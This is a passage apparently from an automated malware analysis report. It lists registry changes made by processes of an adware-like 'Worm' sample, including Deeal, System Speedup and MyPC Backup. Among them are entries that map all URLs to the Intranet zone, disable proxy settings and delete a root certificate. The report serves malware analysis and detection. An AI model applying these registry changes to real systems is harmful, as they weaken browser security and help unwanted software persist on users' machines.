"AppID" = "{562B9317-C08A-444A-9482-62080DD851AE}"
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\AddonsFramework.Navbar\CLSID]
"(Default)" = "{F91870ED-0B2A-4044-903F-19675DCF609D}"
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}]
"(Default)" = "Navbar Class"
[HKCR\TypeLib\{A719A841-028A-427B-807E-667359D91C96}\1.0]
"(Default)" = "ButtonSiteLib"
[HKCR\Interface\{D3BC53E7-0437-4C97-90EE-2CD6FF47FB14}]
"(Default)" = "INavbarButton"
[HKCR\TypeLib\{A719A841-028A-427B-807E-667359D91C96}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{93CF54F5-CFAA-4440-B588-8ED0DFAD5C21}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\AddonsFramework.Navbar.1\CLSID]
"(Default)" = "{F91870ED-0B2A-4044-903F-19675DCF609D}"
[HKCR\Interface\{93CF54F5-CFAA-4440-B588-8ED0DFAD5C21}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{A719A841-028A-427B-807E-667359D91C96}\1.0\0\win32]
"(Default)" = "%Program Files%\Deeal\ButtonSite.dll"
[HKCR\AddonsFramework.Navbar.1]
"(Default)" = "Navbar Class"
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\TypeLib]
"(Default)" = "{A719A841-028A-427B-807E-667359D91C96}"
[HKCR\AppID\{562B9317-C08A-444A-9482-62080DD851AE}]
"(Default)" = "ButtonSite"
[HKCR\Interface\{D3BC53E7-0437-4C97-90EE-2CD6FF47FB14}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{93CF54F5-CFAA-4440-B588-8ED0DFAD5C21}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\InprocServer32]
"(Default)" = "%Program Files%\Deeal\ButtonSite.dll"
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\ProgID]
"(Default)" = "AddonsFramework.Navbar.1"
[HKCR\Interface\{93CF54F5-CFAA-4440-B588-8ED0DFAD5C21}]
"(Default)" = "IButtonImplEvents"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 86 A2 76 0E B0 7E 28 45 B5 21 62 BC 3A 65 F9"
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\VersionIndependentProgID]
"(Default)" = "AddonsFramework.Navbar"
[HKCR\Interface\{D3BC53E7-0437-4C97-90EE-2CD6FF47FB14}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AddonsFramework.Navbar]
"(Default)" = "Navbar Class"
[HKCR\Interface\{D3BC53E7-0437-4C97-90EE-2CD6FF47FB14}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{93CF54F5-CFAA-4440-B588-8ED0DFAD5C21}\TypeLib]
"(Default)" = "{A719A841-028A-427B-807E-667359D91C96}"
[HKCR\Interface\{D3BC53E7-0437-4C97-90EE-2CD6FF47FB14}\TypeLib]
"(Default)" = "{A719A841-028A-427B-807E-667359D91C96}"
[HKCR\TypeLib\{A719A841-028A-427B-807E-667359D91C96}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Deeal"
[HKCR\AddonsFramework.Navbar\CurVer]
"(Default)" = "AddonsFramework.Navbar.1"
The Worm deletes the following registry key(s):
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\Programmable]
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\VersionIndependentProgID]
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\TypeLib]
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}]
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\InprocServer32]
[HKCR\CLSID\{F91870ED-0B2A-4044-903F-19675DCF609D}\ProgID]
The process regsvr32.exe:3396 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}]
"(Default)" = "IUI"
[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\AddonsFramework.DLL]
"AppID" = "{19975B78-1907-4DD6-A437-4C48120F46A4}"
[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}]
"(Default)" = "IExposedContent"
[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{15471168-82D3-49F9-A16B-2F455C1AD4BF}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{15471168-82D3-49F9-A16B-2F455C1AD4BF}\1.0\0\win32]
"(Default)" = "%Program Files%\Deeal\AddonsFramework.dll"
[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\TypeLib\{15471168-82D3-49F9-A16B-2F455C1AD4BF}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Deeal"
[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}]
"(Default)" = "IBrowserEvents"
[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}]
"(Default)" = "IExposed"
[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}]
"(Default)" = "IExtensionContent"
[HKCR\AppID\{19975B78-1907-4DD6-A437-4C48120F46A4}]
"(Default)" = "AddonsFramework"
[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}]
"(Default)" = "IButton"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 DF 71 CF 73 36 67 3A 08 36 B5 92 A0 A1 76 97"
[HKCR\TypeLib\{15471168-82D3-49F9-A16B-2F455C1AD4BF}\1.0]
"(Default)" = "AddonsFramework 1.0 Type Library"
[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}]
"(Default)" = "IContentEvents"
[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}]
"(Default)" = "IInternalEvents"
[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}]
"(Default)" = "IBrowser"
[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}]
"(Default)" = "IExtension"
[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\TypeLib]
"(Default)" = "{15471168-82D3-49F9-A16B-2F455C1AD4BF}"
[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
The process Deeal.exe:3072 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 BF 57 3E 03 34 1A 2F EA 23 C8 BA 33 64 85 6D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"DisplayIcon" = "%Program Files%\Deeal\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"DisplayName" = "Deeal"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"UninstallString" = "%Program Files%\Deeal\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"instdir" = "%Program Files%\Deeal"
"Publisher" = "Deeal"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"DisplayVersion" = "1.0.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"URLInfoAbout" = "http://deeal.net/"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process ssupsetup_sbinstall3_sbinstall3.exe:2716 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 8D 67 44 22 A6 87 E7 C7 EF 31 75 FC F1 C3 6E"
The process AdvancedSystemProtector.exe:640 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 3B FD D1 30 03 0E F4 40 2C 3C F9 93 3B DB 48"
[HKCR\CLSID\{A2BB8BF3-B6B7-ED30-0CBD-449D02DDDDAA}\InprocServer32]
"(Default)" = "%System%\scardssp.dll"
[HKCR\CLSID\{A2BB8BF3-B6B7-ED30-0CBD-449D02DDDDAA}\ProgID]
"(Default)" = "Scardssp.SCardDatabase.1"
[HKCR\CLSID\{A2BB8BF3-B6B7-ED30-0CBD-449D02DDDDAA}\InprocServer32]
"ThreadingModel" = "Free"
[HKCU\Software\Licenses]
"{0AEC6047875E3CE39}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7C A5 44 A3"
[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\CLSID\{A2BB8BF3-B6B7-ED30-0CBD-449D02DDDDAA}\VersionIndependentProgID]
"(Default)" = "Scardssp.SCardDatabase"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\CLSID\{A2BB8BF3-B6B7-ED30-0CBD-449D02DDDDAA}\TypeLib]
"(Default)" = "{82C38704-19F1-11D3-A11F-00C04F79F800}"
[HKCR\CLSID\{A2BB8BF3-B6B7-ED30-0CBD-449D02DDDDAA}]
"(Default)" = "SCardDatabase Class"
[HKCU\Software\Licenses]
"{IAEC6047875E3CE39}" = "01 00 00 00"
The Worm deletes the following value(s) in system registry:
[HKCR\CLSID\{A2BB8BF3-B6B7-ED30-0CBD-449D02DDDDAA}]
"0"
The process MyPC Backup.exe:892 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 6C 5B FE 87 BD 41 63 F6 D3 76 03 92 D1 F1 DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 87 CE 0B 7B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The Worm deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43"
The process %original file name%.exe:1068 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\WinU\Init]
"date" = "2014/08/13"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\WinU\1.0]
"LastExecuted" = "2014/08/13"
"UserSID" = "S-1-5-21-1844237615-1960408961-1801674531-1003"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU]
"~nvpitzc.exe" = "system Stats"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU]
"~ahwapkv.exe" = "Aut2Exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 03 28 49 6F AF 24 1B B5 67 EE E4 32 F7 8A F9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\WinU\1.0]
"Delay" = "25"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\WinU\Init]
"source" = "main"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ssupsetup_sbinstall3_sbinstall3.tmp:2724 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\systweak\ssd]
"ASO3CAM" = "sbinstall3"
"ASOBUILDFOR" = "sbinstall3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"DisplayVersion" = "2.1"
"InstallDate" = "20140813"
[HKLM\SOFTWARE\System Speedup]
"RCPURL" = "http://www.systemspeedup.com/ssu/price.asp?utm_source=sbinstall3&utm_campaign=sbinstall3&utm_medium=newbuild"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\System Speedup\LANG]
"LangID" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Systweak\Params]
"utm_campaign" = "sbinstall3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"DisplayName" = "System Speedup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\System Speedup]
"trackpx" = "http://im.systweak.com/installtracker.aspx?trackpx=TP-1-59-BAB-SYS"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\System Speedup]
"utm_source" = "sbinstall3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"Inno Setup: Icon Group" = "System Speedup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\System Speedup]
"StartAutoTutorial" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"Publisher" = "systemspeedup.com"
[HKCU\Software\System Speedup]
"StartAutoScanOnLaunch" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"NoModify" = "1"
[HKLM\SOFTWARE\System Speedup]
"LaunchASP" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"UninstallString" = "%Program Files%\System Speedup\unins000.exe"
[HKLM\SOFTWARE\System Speedup]
"utm_medium" = "newbuild"
[HKLM\SOFTWARE\Systweak\Params]
"utm_medium" = "newbuild"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\System Speedup]
"RENEWALURL" = "http://www.systemspeedup.com/ssu/renewal.asp?utm_source=sbinstall3&utm_campaign=sbinstall3&utm_medium=newbuild"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
